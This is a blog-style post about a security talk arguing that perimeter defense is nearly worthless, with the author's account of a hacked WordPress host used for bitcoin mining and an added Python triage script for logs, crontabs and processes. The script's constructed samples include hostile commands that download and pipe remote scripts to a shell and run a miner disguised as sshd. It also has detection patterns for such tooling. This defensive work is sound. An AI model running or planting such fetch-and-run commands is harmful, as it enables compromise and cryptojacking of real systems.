Perimeter defense almost worthless
Saw an enlightening talk by the CTO of Trend Micro a few months back. I've been hoping the org that hosted the event posts the video online, but I've been waiting months and nothing yet. Here is another, similar video of him from another event (though the talk I saw was ~45 min, this one is ~10).
I didn't learn anything, but it was awesome to see such honesty from someone in his position: he just comes out and says it. If someone wants to get in, they get in. Just accept it. It doesn't matter how much you invest, it won't be enough. His summary of the RSA break-in was entertaining as well. He admits his own industry is at fault for giving its customers a false sense of security ("just buy this product, it will make you safe"). At the end he was pitching a new product of theirs, but he said on several occasions that it won't protect you against everything.
Here's a PDF from the presentation I was at
Security is not my focus, so I don't try to stay on top of everything in that field, but his coverage of the bank attack in Korea was quite good too (page 36 of the PDF): nearly 50,000 computers disabled. In all, 76 tailor-made malware samples were used, targeting both Windows and Linux/Unix systems.
I normally skip keynotes and stuff at events (the events that I do attend, which in itself is rare). This guy was just great though.
Perhaps the most informative stat he cited: in 2012 the average time an attacker has access to a network before detection was 210 days (35 days longer than in 2011).
Seeing that makes me glad security is not my focus, because really those guys are fighting a war they simply cannot win. "Ooh look, this new shiny firewall or IDS/IPS!! But we still got hacked..."
I dealt with a hacked system on Sunday, the first time in probably 5 years I've been involved in one. The system wasn't being managed by anyone and ran a WordPress blog that was out of date. It seems like some worm got in through one of the recent code execution exploits. For some reason it wiped out the data on the WordPress blog itself (which seems careless, because that's how it was detected almost immediately), downloaded some files and basically turned the host into a bitcoin mining operation (complete with fake program signatures to make it look like normal processes were running, and a crontab entry to re-download itself every so often). I don't believe they ever got root, as they never wiped any of the logs; the Apache error logs clearly showed the exploit in action. The IT folks restored the system from an earlier backup and updated WordPress. Now they want to transition responsibility for this system to me, but I want nothing of it. It was an interesting exercise though; it took only maybe 5 minutes to determine what was going on, obviously not a sophisticated attack.
In the event on Sunday there was absolutely no fancy security system in place; the incident was picked up by basic monitors within minutes of it happening because the worm/attacker wiped out the data, causing the website to return errors.
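As an added example (this is not code from the post, and nothing Trend Micro ships), here is the kind of five-minute offline triage that incident suggests: scan the Apache error log for lines that betray PHP code execution and payload staging, flag crontab entries that re-fetch code or run out of a tmp directory, and flag running processes whose name looks like a normal daemon but whose binary does not live where a packaged daemon would. The log lines, crontab entries and process rows below are constructed; the indicator regexes and the trusted-path prefixes are my assumptions about what such compromises commonly look like, not anything the post states.

```python
"""Offline triage for an outdated-WordPress + miner compromise (added example).

All sample data is constructed. Indicator patterns and TRUSTED_PREFIXES are
assumptions about common attacker tooling, not facts from the original post.
"""
import re

# Apache 2.2-style error_log line: [timestamp] [level] [client IP] message
ERROR_LINE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<level>[^\]]+)\] "
    r"(?:\[client (?P<client>[^\]]+)\] )?(?P<msg>.*)$"
)

# Assumed indicators of PHP code execution / payload staging.
EXPLOIT_INDICATORS = [
    (re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\("), "obfuscated-php"),
    (re.compile(r"\b(shell_exec|system|passthru|exec|popen)\s*\("), "command-exec"),
    (re.compile(r"\b(wget|curl)\b[^']*https?://"), "remote-download"),
    (re.compile(r"\bfile_put_contents\s*\("), "file-write"),
    (re.compile(r"/(tmp|var/tmp|dev/shm)/"), "tmp-path"),
]
PIPE_TO_SHELL = re.compile(r"\b(wget|curl)\b.*\|\s*(ba|z|da)?sh\b")
TMP_DIR = re.compile(r"^/(tmp|var/tmp|dev/shm)/")
# Assumed: binaries of legitimate daemons live under one of these prefixes.
TRUSTED_PREFIXES = ("/usr/", "/bin/", "/sbin/", "/lib/", "/opt/")


def find_exploit_attempts(log_text):
    """Return one dict per error_log line carrying at least one indicator."""
    hits = []
    for raw in log_text.splitlines():
        m = ERROR_LINE.match(raw)
        if not m:
            continue
        tags = [tag for rx, tag in EXPLOIT_INDICATORS if rx.search(m.group("msg"))]
        if tags:
            hits.append({"ts": m.group("ts"), "client": m.group("client"),
                         "tags": tags, "msg": m.group("msg")})
    return hits


def find_persistence(crontab_text):
    """Flag crontab entries that fetch-and-run remote code or run from tmp dirs."""
    findings = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        nfields = 1 if line.startswith("@") else 5   # "@reboot cmd" vs "m h dom mon dow cmd"
        parts = line.split(None, nfields)
        if len(parts) <= nfields:
            continue                                 # malformed: no command part
        command = parts[-1]
        reasons = []
        if PIPE_TO_SHELL.search(command):
            reasons.append("download-piped-to-shell")
        if TMP_DIR.match(command.split()[0]):
            reasons.append("runs-from-tmp")
        if reasons:
            findings.append((line, reasons))
    return findings


def find_masquerading(procs):
    """Flag (pid, comm, exe) rows whose binary is deleted or outside trusted dirs.
    Rows mimic `ps -o pid,comm` joined with `readlink /proc/<pid>/exe`."""
    flagged = []
    for pid, comm, exe in procs:
        if exe.endswith("(deleted)"):
            flagged.append((pid, comm, exe, "binary-deleted-after-exec"))
        elif not exe.startswith(TRUSTED_PREFIXES):
            flagged.append((pid, comm, exe, "untrusted-binary-path"))
    return flagged


# ---- constructed sample input ------------------------------------------------
SAMPLE_ERROR_LOG = """\
[Sun Mar 24 03:11:02 2013] [error] [client 203.0.113.45] PHP Warning:  base64_decode() expects parameter 1 to be string, array given in /var/www/html/wp-content/plugins/example/loader.php on line 12
[Sun Mar 24 03:11:05 2013] [error] [client 203.0.113.45] PHP Warning:  shell_exec(): Unable to execute 'wget -q http://198.51.100.23/x/miner -O /tmp/.m' in /var/www/html/wp-content/uploads/2013/03/cache.php on line 2
[Sun Mar 24 03:11:06 2013] [error] [client 203.0.113.45] PHP Warning:  file_put_contents(/var/www/html/wp-content/uploads/.cache/sh.php): failed to open stream: Permission denied in /var/www/html/wp-content/plugins/example/upload.php on line 40
[Sun Mar 24 03:12:40 2013] [error] [client 198.51.100.7] File does not exist: /var/www/html/favicon.ico
[Sun Mar 24 03:15:09 2013] [error] [client 192.0.2.10] PHP Fatal error:  Call to undefined function wp_head() in /var/www/html/wp-content/themes/default/index.php on line 8
"""
SAMPLE_CRONTAB = """\
# constructed crontab: one re-download job, one benign job, one miner under a daemon name
*/10 * * * * wget -q -O - http://198.51.100.23/x/r.sh | sh > /dev/null 2>&1
0 3 * * * /usr/bin/find /var/tmp -mtime +7 -delete
@reboot /tmp/.m/sshd -o stratum+tcp://198.51.100.23:3333 -u worker -p x
"""
SAMPLE_PROCESSES = [
    (612, "sshd", "/usr/sbin/sshd"),
    (1422, "apache2", "/usr/sbin/apache2"),
    (9031, "sshd", "/tmp/.m/sshd"),
    (9044, "kworker/0:1", "/dev/shm/.x/kworker (deleted)"),
]

if __name__ == "__main__":
    for h in find_exploit_attempts(SAMPLE_ERROR_LOG):
        print(h["ts"], h["client"], ",".join(h["tags"]))
    for line, reasons in find_persistence(SAMPLE_CRONTAB):
        print("CRON", ",".join(reasons), line)
    for pid, comm, exe, reason in find_masquerading(SAMPLE_PROCESSES):
        print("PROC", pid, comm, exe, reason)
```

On a real box you would feed `find_exploit_attempts` the rotated error logs as well (the 210-day dwell-time figure above is a reminder that the interesting lines are often weeks old), run the crontab check over every user's crontab plus /etc/cron.d, and build the process rows from /proc rather than trusting `ps` output on a host whose binaries may have been swapped.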